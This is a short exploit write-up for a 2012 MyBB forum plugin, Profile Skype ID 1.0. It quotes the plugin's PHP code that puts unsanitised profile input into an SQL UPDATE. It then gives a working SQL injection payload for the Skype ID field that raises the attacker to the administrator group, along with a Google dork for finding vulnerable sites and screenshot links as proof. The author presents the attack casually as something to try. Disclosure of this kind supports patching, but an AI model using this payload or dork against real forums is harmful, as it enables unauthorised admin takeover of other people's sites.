# Exploit Title: Profile Skype ID MyBB plugin privilege escalation. # Google Dork: intext:"Skype ID Skype ID:" inurl:member # Date: 12.20.2012 # Exploit Author: Zixem # Software Link: http://mods.mybb.com/view/user-profile-skype-id # Version: 1.0 # Tested on: Linux. ---------------------------------------------- ProfileSkypeID plugin suffers from SQL Injection in UPDATE query. The vulnerabillity exist within profileskype.php which located in /inc/plugins/ folder. <?php $plugins->add_hook("datahandler_user_update", "profileskype_update"); /*Line 15*/ function profileskype_update($skype) /*Line 167*/ { global $mybb; if (isset($mybb->input['skype'])) { $skype->user_update_data['skype'] = $mybb->input['skype']; } } ?> How to exploit: (1) Go to usercp.php?action=profile (2) Insert this following string in your Skype ID: zix', usergroup='4 (3) Have some fun, you're an admin. Proof of concept: (1) Writing the injection: http://i.imgur.com/hg3FW.png (2) Updates the profile and waiting a few seconds: http://i.imgur.com/fkwdi.png (3) You're an admin: http://i.imgur.com/JIkRX.png ---------------------------------------------- [*] Follow for more: http://twitter.com/z1xem [*] http://zixem.altervista.org/ [*] http://zentrixplus.net/Брой прочитания на тази страница: 1247
MyBB Profile Skype ID Plugin 1.0 Privilege Escalation Vulnerability